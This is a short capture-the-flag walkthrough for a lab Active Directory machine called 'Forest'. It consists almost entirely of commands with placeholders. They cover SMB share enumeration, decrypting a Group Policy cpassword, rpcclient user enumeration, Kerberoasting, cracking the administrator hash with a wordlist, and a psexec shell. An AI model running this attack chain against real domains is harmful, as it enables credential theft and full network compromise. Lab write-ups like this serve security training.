Contents

Forest

   Dec 27, 2022     2 min read

Hola, esta es la máquina forest! Let’s hack!

RECON

ping -c 1 <IP>
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP> -oG ports
extractports <ports>
nmap -sCV <PORTS> -oG services

AD DOMAIN DETECTION

crackmapexec smb <IP>
sudo su
nvim /etc/hosts
<IP>	<DOMAIN>

SMB ENUM

smbclient -L <IP> -N
crackmapexec smb <IP> --shares
smbmap -H <IP>
smbmap -H <IP> -r Replication/forest.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
smbmap -H <IP> --download Replication/forest.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
mv <IP>-Replication_forest.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml groups.xml

DECRYPT GROUPS.XML PASSWORD

gpp-decrypt '<CPASSWORD>'

GRANTED SMB ACCESS SVC_TGS USER

crackmapexec smb <IP> -u 'SVC_TGS' -p '<PASSWORD>'
crackmapexec smb <IP> -u 'SVC_TGS' -p '<PASSWORD>' --shares
smbmap -H <IP> -u 'SVC_TGS' -p '<PASSWORD>' -r Users/SVC_TGS/Desktop/user.txt

FLAG USER.TXT

smbmap -H <IP> -u 'SVC_TGS' -p '<PASSWORD>' --download Users/SVC_TGS/Desktop/user.txt
mv <IP>-Users_SVC_TGS_Desktop_user.txt user.txt
cat user.txt

AD ENUM RPCCLIENT

rpcclient -U "SVC_TGS%<PASSWORD>" <IP>
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'enumdomusers'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'enumdomgroups'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'querygroupmem 0x200'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'queryuser 0x1f4'
rpcclient -U "SVC_TGS%<PASSWORD>" <IP> -c 'querydispinfo'
echo SVC_TGS > users.txt

AD TGT GETNPUSERS.PY

GetNPUsers.py forest.htb/ --no-pass -usersfile users.txt

AD USER ENUM KERBRUTE

kerbrute userenum --dc <IP> -d forest.htb /usr/share/Seclists/Usernames/Names/names.txt

ADJUST DATE & TIME WITH AD (OPTIONAL)

ntpdate <IP>

AD TGS GETUSERSPN.PY

GetUserSPN.py forest.htb/SVC_TGS:<PASSWORD> -request

BRUTEFORCE ADMINISTRATOR HASH

echo '<HASH>' > hash
john -w:/usr/share/wordlists/rockyou.txt hash

GRANTED ACCESS ADMINISTRATOR USER

crackmapexec smb <IP> -u 'Administrator' -p '<PASSWORD>'
psexec.py 'forest.htb/Administrator:<PASSWORD>@<IP>' cmd.exe
whoami

FLAG ROOT.TXT

type C:\Users\Administrator\Desktop\root.txt